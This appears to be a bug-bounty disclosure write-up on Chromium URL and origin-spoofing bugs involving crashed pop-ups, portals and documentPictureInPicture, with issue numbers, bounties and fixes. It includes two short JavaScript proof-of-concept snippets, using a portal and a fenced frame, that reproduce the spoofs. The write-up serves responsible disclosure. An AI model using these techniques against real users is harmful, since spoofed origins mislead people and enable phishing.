Writeups

Navigating a crashed page

By crashing a cross-origin pop-up then navigating it to data:html,foo which gets blocked, The URL would stay cross-site but the page would be same-origin Issue 40054631 was duplicate but made a good twitter background.

Later there was a ghost image issue where the page stayed cross-origin but the contents of the previous page showed Issue 40057561 was awarded $1000

I also tried the same thing with portals Issue 40064170 and it worked was awarded $2000. video PoC

// --enable-features=Portals,PortalsCrossOrigin
// onclick is optional
onclick = () => {
  portal = document.createElement('portal');
  // Victim page crashs
  portal.src = 'https://ndev.tk/crashself.html';
  document.body.appendChild(portal);
  setTimeout(() => {
    // HTTP STATUS 204
    portal.src = 'https://terjanq.me/xss.php?status=204';
    portal.activate();
  }, 6000);
};

These attacks where migrated by needing to crash cross-site, however Issue 40054631 had a way to do it similar to the crossOriginIsolated bypass and any extension can crash any tab Issue 40848497

Spoofing documentPictureInPicture

Did not update security UI on about:blank navigations so any window reference allowed for a spoof. video PoC

This was awarded $1000 and fixed in Issue 40062959 by ensuring subsequent about:blank loads close the PiP window. First patch was bypassable by using the extension chrome.tabs.discard() API. video PoC.

When using fenced frames documentPictureInPicture would display the top-page origin not the embed.

f = document.createElement('fencedframe');
f.src =
  'https://terjanq.me/xss.php?h[Supports-Loading-Mode]=fenced-frame&js=onclick=()=>documentPictureInPicture.requestWindow();';
document.body.appendChild(f);

This was awarded $4000 and fixed in Issue 40062954 and Issue 40063068 by making it so non-top most frames can’t open PiP.

Improve this page